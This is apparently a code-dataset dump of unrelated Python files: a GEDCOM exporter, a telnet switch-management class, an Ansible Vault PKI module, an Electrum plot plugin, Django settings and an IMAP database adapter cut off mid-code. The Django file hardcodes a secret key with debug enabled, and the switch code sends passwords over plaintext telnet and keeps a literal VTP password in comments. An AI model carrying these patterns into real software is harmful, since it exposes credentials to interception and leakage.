{1:1} +1 FORM <PLACE_HIERARCHY> {0:1} +1 FONE <PLACE_PHONETIC_VARIATION> {0:M} # not used +2 TYPE <PHONETIC_TYPE> {1:1} +1 ROMN <PLACE_ROMANIZED_VARIATION> {0:M} # not used +2 TYPE <ROMANIZED_TYPE> {1:1} +1 MAP {0:1} +2 LATI <PLACE_LATITUDE> {1:1} +2 LONG <PLACE_LONGITUDE> {1:1} +1 <<NOTE_STRUCTURE>> {0:M} """ if place is None: return place_name = _pd.display(self.dbase, place, dateobj) self._writeln(level, "PLAC", place_name.replace('\r', ' '), limit=120) longitude = place.get_longitude() latitude = place.get_latitude() if longitude and latitude: (latitude, longitude) = conv_lat_lon(latitude, longitude, "GEDCOM") if longitude and latitude: self._writeln(level + 1, "MAP") self._writeln(level + 2, 'LATI', latitude) self._writeln(level + 2, 'LONG', longitude) # The Gedcom standard shows that an optional address structure can # be written out in the event detail. # http://homepages.rootsweb.com/~pmcbride/gedcom/55gcch2.htm#EVENT_DETAIL location = get_main_location(self.dbase, place) street = location.get(PlaceType.STREET) locality = location.get(PlaceType.LOCALITY) city = location.get(PlaceType.CITY) state = location.get(PlaceType.STATE) country = location.get(PlaceType.COUNTRY) postal_code = place.get_code() if street or locality or city or state or postal_code or country: self._writeln(level, "ADDR", street) if street: self._writeln(level + 1, 'ADR1', street) if locality: self._writeln(level + 1, 'ADR2', locality) if city: self._writeln(level + 1, 'CITY', city) if state: self._writeln(level + 1, 'STAE', state) if postal_code: self._writeln(level + 1, 'POST', postal_code) if country: self._writeln(level + 1, 'CTRY', country) self._note_references(place.get_note_list(), level + 1) def __write_addr(self, level, addr): """ n ADDR <ADDRESS_LINE> {0:1} +1 CONT <ADDRESS_LINE> {0:M} +1 ADR1 <ADDRESS_LINE1> {0:1} (Street) +1 ADR2 <ADDRESS_LINE2> {0:1} (Locality) +1 CITY <ADDRESS_CITY> {0:1} +1 STAE <ADDRESS_STATE> {0:1} +1 POST <ADDRESS_POSTAL_CODE> {0:1} +1 CTRY <ADDRESS_COUNTRY> {0:1} This is done along the lines suggested by Tamura Jones in http://www.tamurajones.net/GEDCOMADDR.xhtml as a result of bug 6382. "GEDCOM writers should always use the structured address format, and it use it for all addresses, including the submitter address and their own corporate address." "Vendors that want their product to pass even the strictest GEDCOM validation, should include export to the old free-form format..." [This goes on to say the free-form should be an option, but we have not made it an option in Gramps]. @param level: The level number for the ADDR tag @type level: Integer @param addr: The location or address @type addr: [a super-type of] LocationBase """ if addr.get_street() or addr.get_locality() or addr.get_city() or \ addr.get_state() or addr.get_postal_code or addr.get_country(): self._writeln(level, 'ADDR', addr.get_street()) if addr.get_locality(): self._writeln(level + 1, 'CONT', addr.get_locality()) if addr.get_city(): self._writeln(level + 1, 'CONT', addr.get_city()) if addr.get_state(): self._writeln(level + 1, 'CONT', addr.get_state()) if addr.get_postal_code(): self._writeln(level + 1, 'CONT', addr.get_postal_code()) if addr.get_country(): self._writeln(level + 1, 'CONT', addr.get_country()) if addr.get_street(): self._writeln(level + 1, 'ADR1', addr.get_street()) if addr.get_locality(): self._writeln(level + 1, 'ADR2', addr.get_locality()) if addr.get_city(): self._writeln(level + 1, 'CITY', addr.get_city()) if addr.get_state(): self._writeln(level + 1, 'STAE', addr.get_state()) if addr.get_postal_code(): self._writeln(level + 1, 'POST', addr.get_postal_code()) if addr.get_country(): self._writeln(level + 1, 'CTRY', addr.get_country()) #------------------------------------------------------------------------- # # # #------------------------------------------------------------------------- def export_data(database, filename, user, option_box=None): """ External interface used to register with the plugin system. """ ret = False try: ged_write = GedcomWriter(database, user, option_box) ret = ged_write.write_gedcom_file(filename) except IOError as msg: msg2 = _("Could not create %s") % filename user.notify_error(msg2, str(msg)) except DatabaseError as msg: user.notify_db_error("%s\n%s" % (_("GEDCOM Export failed"), str(msg))) return ret
gpl-2.0
-1,091,929,293,636,996,400
37.137667
81
0.520455
false
3.604482
false
false
false
berserkerbernhard/Lidskjalv
code/networkmonitor/modules/misc/switchhandler.py
1
6889
from modules.lidskjalvloggingtools import loginfo import telnetlib import time WAIT = 5 class SwitchHandler(): def __init__(self, u, p, e): self.loginpasswords = [p] self.loginusername = u self.loginenable = e self.logintries = 5 self.telnettimeout = 10 def get_switch_name(self, tn): if tn is None: raise Exception("NOT A TELNET CONNECTION!!!!!!") tn.write(b"\n") RES = str(tn.read_until(b"#", 2)) loginfo(RES) switchname = RES.split("#")[0].split("\\n")[1] loginfo("switchname: %s" % switchname) return switchname def login_to_switch(self, tn): if tn is None: raise Exception("NOT A TELNET CONNECTION", "in function loginToSwitch!!!!!!") for loginpassword in self.loginpasswords: loginfo("Trying password: %s" % (loginpassword)) RES = tn.read_until(b":", 2) loginfo("Connection read data: %s" % RES) loginfo(">>>> Sending password: %s" % loginpassword) tn.write(loginpassword.encode('ascii') + b"\n") loginfo(">>>> Sending password DONE") RES = tn.read_until(b":", 2) loginfo("Connection read data: %s" % RES) if ">" in str(RES): loginfo("+++++++++ Logged in !!!!!!!!!!") return [tn, loginpassword] return None def enableSwitch(self, tn): print(tn) loginfo("enableSwitch start") if tn is None: raise Exception("NOT A TELNET CONNECTION!!!!!!") tn.write(b"\n") RES = tn.read_until(b":", 2) print("RES:", RES) loginfo("RES: %s" % str(RES)) if "Bad passwords" in str(RES): print("Try log in again with another password(%s)" % self.loginenable) if ">" in str(RES) \ or "Password" in str(RES) \ or "User Access Verification" in str(RES): loginfo("Ready for enable ...") t = b"enable\n" print(t) tn.write(t) RES = tn.read_until(b":", 2) print("RES:", RES) loginfo("Attempting to log in.") # mbs loginfo("Sending enable: %s" % self.loginenable) print("Sending enable: %s" % self.loginenable) tn.write(self.loginenable.encode('ascii') + b"\n") print("login enable sent. Testing for response.") RES = tn.read_until(b"#", self.telnettimeout) loginfo(RES) if "#" in str(RES): loginfo("We're logged in.") return tn else: loginfo("Still not logged in. :-(") loginfo("Nothing happended!!! WTF???") return None def openTelnetConnection(self, HOST): print("Try login to host: %s" % HOST) for thistry in range(self.logintries): loginfo("Try: %s" % str(thistry + 1)) try: print(HOST, 23, self.telnettimeout) tn = telnetlib.Telnet(HOST, 23, self.telnettimeout) loginfo("Connection established to %s." % HOST) return tn except: loginfo("Failed to open connection: %s" % HOST) return None # def setVTPMode(self, tn, HOSTNAME, device): # tn.write("\r\n") # tn.read_until("#", WAIT) # tn.write("\r\n") # tn.read_until("#", WAIT) # tn.write("\r\n") # tn.read_until("#", WAIT) # tn.write("conf t\r\n") # resultdata = tn.read_until("#", 5) # if device == "172.17.128.61": # print "VTP Server:", device # tn.write("vtp mode server\r\n") # else: # print "VTP Client:", device # tn.write("vtp mode client\r\n") # resultdata = tn.read_until("#", 5) # tn.write("vtp domain VTP-20141209-1\r\n") # resultdata = tn.read_until("#", 5) # tn.write("vtp password FSNAAL-VTP\r\n") # resultdata = tn.read_until("#", 5) # tn.write("exit\r\n") # resultdata = tn.read_until("#", 5) # tn.write("wr\r\n") # resultdata = tn.read_until("#", 5) def setTermLen(self, tn): tn.write(b"terminal length 0\n") loginfo(tn.read_until(b"#", WAIT)) def get_interfaces(self, tn): tn.write(b"\r\n") loginfo(tn.read_until(b"#", WAIT)) tn.write(b"\r\n") loginfo(tn.read_until(b"#", WAIT)) tn.write(b"\r\n") loginfo(tn.read_until(b"#", WAIT)) tn.write(b"sh int\r\n") r = str(tn.read_until(b"#", self.telnettimeout)) r = "\n".join(r.split("\\r\\n")) loginfo("Result from show interfaces:\n%s" % r) return r def get_cdp_neighbors_detail(self, tn): tn.write(b"\r\n") loginfo(tn.read_until(b"#", WAIT)) tn.write(b"\r\n") loginfo(tn.read_until(b"#", WAIT)) tn.write(b"\r\n") loginfo(tn.read_until(b"#", WAIT)) tn.write(b"sh cdp neighbors detail\r\n") resultdata = tn.read_until(b"#", self.telnettimeout) return resultdata.decode() def writeDescriptionToInterface(self, tn, interface, description): loginfo("1: %s" % tn.read_until(b"#", WAIT)) tn.write(b"conf t\r\n") loginfo("2: %s" % tn.read_until(b"#", WAIT)) sendstring = "int %s\r\n" % interface tn.write(sendstring.encode()) loginfo(tn.read_until(b"#", WAIT)) loginfo("3: %s" % tn.read_until(b"#", WAIT)) sendstring = "description %s %s\r\n" % (description, time.ctime()) tn.write(sendstring.encode()) loginfo(tn.read_until(b"#", WAIT)) loginfo("4: %s" % tn.read_until(b"#", WAIT)) tn.write(b"exit\r\n") loginfo("5: %s" % tn.read_until(b"#", WAIT)) tn.write(b"exit\r\n") loginfo("6: %s" % tn.read_until(b"#", WAIT)) tn.write(b"wr\r\n") loginfo(tn.read_until(b"#", WAIT)) def showRunningConfig(self, tn): tn.read_until(b"#", WAIT) tn.write(b"sh run\r\n") r = tn.read_until(b"#", WAIT) r = str(r) r = r.replace("\\r\\n", "\n") # print(r) return r def addDescriptionToAllTrunkInterfaces(self, tn): neighbors = self.getCdpNeighborsDetail(tn, "") # print("neighbors", neighbors) for neighbor in neighbors: # print("neighbor", neighbor) if neighbor != ["", "", ""]: self.writeDescriptionToInterface(tn, neighbor[1], "%s %s" % (neighbor[0], neighbor[2]))
gpl-3.0
8,448,278,225,030,082,000
32.935961
74
0.497169
false
3.378617
false
false
false
TerryHowe/ansible-modules-hashivault
ansible/modules/hashivault/hashivault_pki_cert_sign.py
1
6865
#!/usr/bin/env python from ansible.module_utils.hashivault import hashivault_auth_client from ansible.module_utils.hashivault import hashivault_argspec from ansible.module_utils.hashivault import hashivault_init from ansible.module_utils.hashivault import hashiwrapper ANSIBLE_METADATA = {'status': ['preview'], 'supported_by': 'community', 'version': '1.1'} DOCUMENTATION = r''' --- module: hashivault_pki_cert_sign version_added: "4.5.0" short_description: Hashicorp Vault PKI Sign CSR ( Certificate / Intermediate / Verbatim ) description: - This module signs a new certificate based upon the provided CSR and the supplied parameters. options: csr: recuired: true description: - Specifies the PEM-encoded CSR. role: description: - Specifies the name of the role to create. - 'For *verbatim* type if set, the following parameters from the role will have effect: `ttl`, `max_ttl`, `generate_lease`, and `no_store`.' common_name: description: - Specifies the requested CN for the certificate. If the CN is allowed by role policy, it will be issued. mount_point: default: pki description: - location where secrets engine is mounted. also known as path type: type: str description: - Sign a new certificate with `certificate` based upon the provided CSR and the supplied parameters, subject to the restrictions contained in the role named in the endpoint. The issuing CA certificate is returned as well, so that only the root CA need be in a client's trust store. - Use `intermediate` to configure CA certificate to issue a certificate with appropriate values for acting as an intermediate CA. Distribution points use the values set via config/urls. Values set in the CSR are ignored unless use_csr_values is set to true, in which case the values from the CSR are used verbatim. - Use `verbatim` to sign a new certificate based upon the provided CSR. Values are taken verbatim from the CSR; the only restriction is that this endpoint will refuse to issue an intermediate CA certificate (use `intermediate` type for that functionality.) choices: ["certificate", "intermediate", "verbatim"] default: certificate extra_params: description: Extra parameters depending on the type. type: dict extends_documentation_fragment: - hashivault ''' EXAMPLES = r''' --- - hosts: localhost tasks: - hashivault_pki_cert_sign: role: 'tester' common_name: 'test.example.com' register: cert - debug: msg="{{ cert }}" ''' def main(): argspec = hashivault_argspec() argspec['csr'] = dict(required=True, type='str') argspec['role'] = dict(required=False, type='str') argspec['common_name'] = dict(required=False, type='str') argspec['extra_params'] = dict(required=False, type='dict', default={}) argspec['mount_point'] = dict(required=False, type='str', default='pki') argspec['type'] = dict(required=False, type='str', default='certificate', choices=["certificate", "intermediate", "verbatim"]) module = hashivault_init(argspec) result = hashivault_pki_cert_sign(module) if result.get('failed'): module.fail_json(**result) else: module.exit_json(**result) def certificate(params, mount_point, client): csr = params.get('csr') common_name = params.get('common_name') extra_params = params.get('extra_params') role = params.get('role').strip('/') # check if role exists try: current_state = client.secrets.pki.read_role(name=role, mount_point=mount_point).get('data') except Exception: current_state = {} if not current_state: return {'failed': True, 'rc': 1, 'msg': 'role not found or permission denied'} if not common_name: return {'failed': True, 'rc': 1, 'msg': 'Missing required options: common_name'} result = {"changed": False, "rc": 0} try: result['data'] = client.secrets.pki.sign_certificate(csr=csr, name=role, mount_point=mount_point, common_name=common_name, extra_params=extra_params).get('data') result['changed'] = True except Exception as e: result['rc'] = 1 result['failed'] = True result['msg'] = u"Exception: " + str(e) return result def intermediate(params, mount_point, client): csr = params.get('csr') common_name = params.get('common_name') extra_params = params.get('extra_params') if not common_name: return {'failed': True, 'rc': 1, 'msg': 'Missing required options: common_name'} result = {"changed": False, "rc": 0} try: result['data'] = client.secrets.pki.sign_intermediate(csr=csr, common_name=common_name, extra_params=extra_params, mount_point=mount_point).get('data') result['changed'] = True except Exception as e: result['rc'] = 1 result['failed'] = True result['msg'] = u"Exception: " + str(e) return result def verbatim(params, mount_point, client): csr = params.get('csr') extra_params = params.get('extra_params') role = params.get('role').strip('/') # check if role exists try: current_state = client.secrets.pki.read_role(name=role, mount_point=mount_point).get('data') except Exception: current_state = {} if not current_state: return {'failed': True, 'rc': 1, 'msg': 'role not found or permission denied'} result = {"changed": False, "rc": 0} try: result['data'] = client.secrets.pki.sign_verbatim(csr=csr, name=role, extra_params=extra_params, mount_point=mount_point).get('data') result['changed'] = True except Exception as e: result['rc'] = 1 result['failed'] = True result['msg'] = u"Exception: " + str(e) return result @hashiwrapper def hashivault_pki_cert_sign(module): supported_types = { 'certificate': certificate, 'intermediate': intermediate, 'verbatim': verbatim } params = module.params client = hashivault_auth_client(params) mount_point = params.get('mount_point').strip('/') return supported_types[params.get('type')](params=params, mount_point=mount_point, client=client) if __name__ == '__main__': main()
mit
-7,423,627,915,068,720,000
37.567416
120
0.606555
false
4.103407
false
false
false
justinvforvendetta/electrum-boli
plugins/plot.py
1
3669
from PyQt4.QtGui import * from electrum_boli.plugins import BasePlugin, hook from electrum_boli.i18n import _ import datetime from electrum_boli.util import format_satoshis from electrum_boli.bitcoin import COIN try: import matplotlib.pyplot as plt import matplotlib.dates as md from matplotlib.patches import Ellipse from matplotlib.offsetbox import AnchoredOffsetbox, TextArea, DrawingArea, HPacker flag_matlib=True except: flag_matlib=False class Plugin(BasePlugin): def is_available(self): if flag_matlib: return True else: return False @hook def init_qt(self, gui): self.win = gui.main_window @hook def export_history_dialog(self, d,hbox): self.wallet = d.wallet history = self.wallet.get_history() if len(history) > 0: b = QPushButton(_("Preview plot")) hbox.addWidget(b) b.clicked.connect(lambda: self.do_plot(self.wallet, history)) else: b = QPushButton(_("No history to plot")) hbox.addWidget(b) def do_plot(self, wallet, history): balance_Val=[] fee_val=[] value_val=[] datenums=[] unknown_trans = 0 pending_trans = 0 counter_trans = 0 balance = 0 for item in history: tx_hash, confirmations, value, timestamp, balance = item if confirmations: if timestamp is not None: try: datenums.append(md.date2num(datetime.datetime.fromtimestamp(timestamp))) balance_Val.append(1000.*balance/COIN) except [RuntimeError, TypeError, NameError] as reason: unknown_trans += 1 pass else: unknown_trans += 1 else: pending_trans += 1 value_val.append(1000.*value/COIN) if tx_hash: label, is_default_label = wallet.get_label(tx_hash) label = label.encode('utf-8') else: label = "" f, axarr = plt.subplots(2, sharex=True) plt.subplots_adjust(bottom=0.2) plt.xticks( rotation=25 ) ax=plt.gca() x=19 test11="Unknown transactions = "+str(unknown_trans)+" Pending transactions = "+str(pending_trans)+" ." box1 = TextArea(" Test : Number of pending transactions", textprops=dict(color="k")) box1.set_text(test11) box = HPacker(children=[box1], align="center", pad=0.1, sep=15) anchored_box = AnchoredOffsetbox(loc=3, child=box, pad=0.5, frameon=True, bbox_to_anchor=(0.5, 1.02), bbox_transform=ax.transAxes, borderpad=0.5, ) ax.add_artist(anchored_box) plt.ylabel('mBOLI') plt.xlabel('Dates') xfmt = md.DateFormatter('%Y-%m-%d') ax.xaxis.set_major_formatter(xfmt) axarr[0].plot(datenums,balance_Val,marker='o',linestyle='-',color='blue',label='Balance') axarr[0].legend(loc='upper left') axarr[0].set_title('History Transactions') xfmt = md.DateFormatter('%Y-%m-%d') ax.xaxis.set_major_formatter(xfmt) axarr[1].plot(datenums,value_val,marker='o',linestyle='-',color='green',label='Value') axarr[1].legend(loc='upper left') # plt.annotate('unknown transaction = %d \n pending transactions = %d' %(unknown_trans,pending_trans),xy=(0.7,0.05),xycoords='axes fraction',size=12) plt.show()
gpl-3.0
-4,475,255,244,508,078,600
28.119048
156
0.562551
false
3.806017
false
false
false
subash68/pyconvideo
src/pyconvideo/settings.py
1
3180
""" Django settings for pyconvideo project. Generated by 'django-admin startproject' using Django 1.9.2. For more information on this file, see https://docs.djangoproject.com/en/1.9/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.9/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = '$@_5k3q-++9=bs50d0+tjkw^(iy+_5z$ycu!9l-o-r4_co1#ww' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE_CLASSES = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'pyconvideo.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'pyconvideo.wsgi.application' # Database # https://docs.djangoproject.com/en/1.9/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.9/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.9/howto/static-files/ STATIC_URL = '/static/'
gpl-3.0
-5,179,506,293,819,358,000
24.853659
91
0.688679
false
3.517699
false
false
false
xiang12835/python_web
py2_web2py/web2py/gluon/packages/dal/pydal/contrib/imap_adapter.py
4
43046
# -*- coding: utf-8 -*- import datetime import re import sys from .._globals import IDENTITY, GLOBAL_LOCKER from .._compat import PY2, integer_types, basestring from ..connection import ConnectionPool from ..objects import Field, Query, Expression from ..helpers.classes import SQLALL from ..helpers.methods import use_common_filters from ..adapters.base import NoSQLAdapter long = integer_types[-1] class IMAPAdapter(NoSQLAdapter): """ IMAP server adapter This class is intended as an interface with email IMAP servers to perform simple queries in the web2py DAL query syntax, so email read, search and other related IMAP mail services (as those implemented by brands like Google(r), and Yahoo!(r) can be managed from web2py applications. The code uses examples by Yuji Tomita on this post: http://yuji.wordpress.com/2011/06/22/python-imaplib-imap-example-with-gmail/#comment-1137 and is based in docs for Python imaplib, python email and email IETF's (i.e. RFC2060 and RFC3501) This adapter was tested with a small set of operations with Gmail(r). Other services requests could raise command syntax and response data issues. It creates its table and field names "statically", meaning that the developer should leave the table and field definitions to the DAL instance by calling the adapter's .define_tables() method. The tables are defined with the IMAP server mailbox list information. .define_tables() returns a dictionary mapping dal tablenames to the server mailbox names with the following structure: {<tablename>: str <server mailbox name>} Here is a list of supported fields: =========== ============== =========== Field Type Description =========== ============== =========== uid string answered boolean Flag created date content list:string A list of dict text or html parts to string cc string bcc string size integer the amount of octets of the message* deleted boolean Flag draft boolean Flag flagged boolean Flag sender string recent boolean Flag seen boolean Flag subject string mime string The mime header declaration email string The complete RFC822 message (*) attachments list Each non text part as dict encoding string The main detected encoding =========== ============== =========== (*) At the application side it is measured as the length of the RFC822 message string WARNING: As row id's are mapped to email sequence numbers, make sure your imap client web2py app does not delete messages during select or update actions, to prevent updating or deleting different messages. Sequence numbers change whenever the mailbox is updated. To avoid this sequence numbers issues, it is recommended the use of uid fields in query references (although the update and delete in separate actions rule still applies). :: # This is the code recommended to start imap support # at the app's model: imapdb = DAL("imap://user:password@server:port", pool_size=1) # port 993 for ssl imapdb.define_tables() Here is an (incomplete) list of possible imap commands:: # Count today's unseen messages # smaller than 6000 octets from the # inbox mailbox q = imapdb.INBOX.seen == False q &= imapdb.INBOX.created == datetime.date.today() q &= imapdb.INBOX.size < 6000 unread = imapdb(q).count() # Fetch last query messages rows = imapdb(q).select() # it is also possible to filter query select results with limitby and # sequences of mailbox fields set.select(<fields sequence>, limitby=(<int>, <int>)) # Mark last query messages as seen messages = [row.uid for row in rows] seen = imapdb(imapdb.INBOX.uid.belongs(messages)).update(seen=True) # Delete messages in the imap database that have mails from mr. Gumby deleted = 0 for mailbox in imapdb.tables deleted += imapdb(imapdb[mailbox].sender.contains("gumby")).delete() # It is possible also to mark messages for deletion instead of ereasing them # directly with set.update(deleted=True) # This object give access # to the adapter auto mailbox # mapped names (which native # mailbox has what table name) imapdb.mailboxes <dict> # tablename, server native name pairs # To retrieve a table native mailbox name use: imapdb.<table>.mailbox ### New features v2.4.1: # Declare mailboxes statically with tablename, name pairs # This avoids the extra server names retrieval imapdb.define_tables({"inbox": "INBOX"}) # Selects without content/attachments/email columns will only # fetch header and flags imapdb(q).select(imapdb.INBOX.sender, imapdb.INBOX.subject) """ drivers = ('imaplib',) types = { 'string': str, 'text': str, 'date': datetime.date, 'datetime': datetime.datetime, 'id': long, 'boolean': bool, 'integer': int, 'bigint': long, 'blob': str, 'list:string': str } dbengine = 'imap' REGEX_URI = re.compile('^(?P<user>[^:]+)(\:(?P<password>[^@]*))?@(?P<host>\[[^/]+\]|[^\:@]+)(\:(?P<port>[0-9]+))?$') def __init__(self, db, uri, pool_size=0, folder=None, db_codec ='UTF-8', credential_decoder=IDENTITY, driver_args={}, adapter_args={}, do_connect=True, after_connection=None): super(IMAPAdapter, self).__init__( db=db, uri=uri, pool_size=pool_size, folder=folder, db_codec=db_codec, credential_decoder=credential_decoder, driver_args=driver_args, adapter_args=adapter_args, do_connect=do_connect, after_connection=after_connection) # db uri: user@example.com:password@imap.server.com:123 # TODO: max size adapter argument for preventing large mail transfers if do_connect: self.find_driver(adapter_args) self.credential_decoder = credential_decoder self.driver_args = driver_args self.adapter_args = adapter_args self.mailbox_size = None self.static_names = None self.charset = sys.getfilesystemencoding() # imap class self.imap4 = None uri = uri.split("://")[1] """ MESSAGE is an identifier for sequence number""" self.flags = {'deleted': '\\Deleted', 'draft': '\\Draft', 'flagged': '\\Flagged', 'recent': '\\Recent', 'seen': '\\Seen', 'answered': '\\Answered'} self.search_fields = { 'id': 'MESSAGE', 'created': 'DATE', 'uid': 'UID', 'sender': 'FROM', 'to': 'TO', 'cc': 'CC', 'bcc': 'BCC', 'content': 'TEXT', 'size': 'SIZE', 'deleted': '\\Deleted', 'draft': '\\Draft', 'flagged': '\\Flagged', 'recent': '\\Recent', 'seen': '\\Seen', 'subject': 'SUBJECT', 'answered': '\\Answered', 'mime': None, 'email': None, 'attachments': None } m = self.REGEX_URI.match(uri) user = m.group('user') password = m.group('password') host = m.group('host') port = int(m.group('port')) over_ssl = False if port==993: over_ssl = True driver_args.update(host=host,port=port, password=password, user=user) def connector(driver_args=driver_args): # it is assumed sucessful authentication alLways # TODO: support direct connection and login tests if over_ssl: self.imap4 = self.driver.IMAP4_SSL else: self.imap4 = self.driver.IMAP4 connection = self.imap4(driver_args["host"], driver_args["port"]) data = connection.login(driver_args["user"], driver_args["password"]) # static mailbox list connection.mailbox_names = None # dummy dbapi functions connection.cursor = lambda : self.fake_cursor connection.close = lambda : None connection.commit = lambda : None return connection self.db.define_tables = self.define_tables self.connector = connector if do_connect: self.reconnect() def reconnect(self, f=None): """ IMAP4 Pool connection method imap connection lacks of self cursor command. A custom command should be provided as a replacement for connection pooling to prevent uncaught remote session closing """ if getattr(self, 'connection', None) is not None: return if f is None: f = self.connector if not self.pool_size: self.connection = f() self.cursor = self.connection.cursor() else: POOLS = ConnectionPool.POOLS uri = self.uri while True: GLOBAL_LOCKER.acquire() if not uri in POOLS: POOLS[uri] = [] if POOLS[uri]: self.connection = POOLS[uri].pop() GLOBAL_LOCKER.release() self.cursor = self.connection.cursor() if self.cursor and self.check_active_connection: try: # check if connection is alive or close it result, data = self.connection.list() except: # Possible connection reset error # TODO: read exception class self.connection = f() break else: GLOBAL_LOCKER.release() self.connection = f() self.cursor = self.connection.cursor() break self.after_connection_hook() def get_last_message(self, tablename): last_message = None # request mailbox list to the server if needed. if not isinstance(self.connection.mailbox_names, dict): self.get_mailboxes() try: result = self.connection.select( self.connection.mailbox_names[tablename]) last_message = int(result[1][0]) # Last message must be a positive integer if last_message == 0: last_message = 1 except (IndexError, ValueError, TypeError, KeyError): e = sys.exc_info()[1] self.db.logger.debug("Error retrieving the last mailbox" + " sequence number. %s" % str(e)) return last_message def get_uid_bounds(self, tablename): if not isinstance(self.connection.mailbox_names, dict): self.get_mailboxes() # fetch first and last messages # return (first, last) messages uid's last_message = self.get_last_message(tablename) result, data = self.connection.uid("search", None, "(ALL)") uid_list = data[0].strip().split() if len(uid_list) <= 0: return None else: return (uid_list[0], uid_list[-1]) def convert_date(self, date, add=None, imf=False): if add is None: add = datetime.timedelta() """ Convert a date object to a string with d-Mon-Y style for IMAP or the inverse case add <timedelta> adds to the date object """ months = [None, "JAN","FEB","MAR","APR","MAY","JUN", "JUL", "AUG","SEP","OCT","NOV","DEC"] if isinstance(date, basestring): # Prevent unexpected date response format try: if "," in date: dayname, datestring = date.split(",") else: dayname, datestring = None, date date_list = datestring.strip().split() year = int(date_list[2]) month = months.index(date_list[1].upper()) day = int(date_list[0]) hms = list(map(int, date_list[3].split(":"))) return datetime.datetime(year, month, day, hms[0], hms[1], hms[2]) + add except (ValueError, AttributeError, IndexError) as e: self.db.logger.error("Could not parse date text: %s. %s" % (date, e)) return None elif isinstance(date, (datetime.date, datetime.datetime)): if imf: date_format = "%a, %d %b %Y %H:%M:%S %z" else: date_format = "%d-%b-%Y" return (date + add).strftime(date_format) else: return None @staticmethod def header_represent(f, r): from email.header import decode_header text, encoding = decode_header(f)[0] if encoding: text = text.decode(encoding).encode('utf-8') return text def encode_text(self, text, charset, errors="replace"): """ convert text for mail to unicode""" if text is None: text = "" if PY2: if isinstance(text, str): if charset is None: text = unicode(text, "utf-8", errors) else: text = unicode(text, charset, errors) else: raise Exception("Unsupported mail text type %s" % type(text)) return text.encode("utf-8") else: if isinstance(text, bytes): return text.decode("utf-8") return text def get_charset(self, message): charset = message.get_content_charset() return charset def get_mailboxes(self): """ Query the mail database for mailbox names """ if self.static_names: # statically defined mailbox names self.connection.mailbox_names = self.static_names return self.static_names.keys() mailboxes_list = self.connection.list() self.connection.mailbox_names = dict() mailboxes = list() x = 0 for item in mailboxes_list[1]: x = x + 1 item = item.strip() if not "NOSELECT" in item.upper(): sub_items = item.split("\"") sub_items = [sub_item for sub_item in sub_items \ if len(sub_item.strip()) > 0] # mailbox = sub_items[len(sub_items) -1] mailbox = sub_items[-1].strip() # remove unwanted characters and store original names # Don't allow leading non alphabetic characters mailbox_name = re.sub('^[_0-9]*', '', re.sub('[^_\w]','',re.sub('[/ ]','_',mailbox))) mailboxes.append(mailbox_name) self.connection.mailbox_names[mailbox_name] = mailbox return mailboxes def get_query_mailbox(self, query): nofield = True tablename = None attr = query while nofield: if hasattr(attr, "first"): attr = attr.first if isinstance(attr, Field): return attr.tablename elif isinstance(attr, Query): pass else: return None else: return None return tablename def is_flag(self, flag): if self.search_fields.get(flag, None) in self.flags.values(): return True else: return False def define_tables(self, mailbox_names=None): """ Auto create common IMAP fileds This function creates fields definitions "statically" meaning that custom fields as in other adapters should not be supported and definitions handled on a service/mode basis (local syntax for Gmail(r), Ymail(r) Returns a dictionary with tablename, server native mailbox name pairs. """ if mailbox_names: # optional statically declared mailboxes self.static_names = mailbox_names else: self.static_names = None if not isinstance(self.connection.mailbox_names, dict): self.get_mailboxes() names = self.connection.mailbox_names.keys() for name in names: self.db.define_table("%s" % name, Field("uid", writable=False), Field("created", "datetime", writable=False), Field("content", "text", writable=False), Field("to", writable=False), Field("cc", writable=False), Field("bcc", writable=False), Field("sender", writable=False), Field("size", "integer", writable=False), Field("subject", writable=False), Field("mime", writable=False), Field("email", "text", writable=False, readable=False), Field("attachments", "text", writable=False, readable=False), Field("encoding", writable=False), Field("answered", "boolean"), Field("deleted", "boolean"), Field("draft", "boolean"), Field("flagged", "boolean"), Field("recent", "boolean", writable=False), Field("seen", "boolean") ) # Set a special _mailbox attribute for storing # native mailbox names self.db[name].mailbox = \ self.connection.mailbox_names[name] # decode quoted printable self.db[name].to.represent = self.db[name].cc.represent = \ self.db[name].bcc.represent = self.db[name].sender.represent = \ self.db[name].subject.represent = self.header_represent # Set the db instance mailbox collections self.db.mailboxes = self.connection.mailbox_names return self.db.mailboxes def create_table(self, *args, **kwargs): # not implemented # but required by DAL pass def select(self, 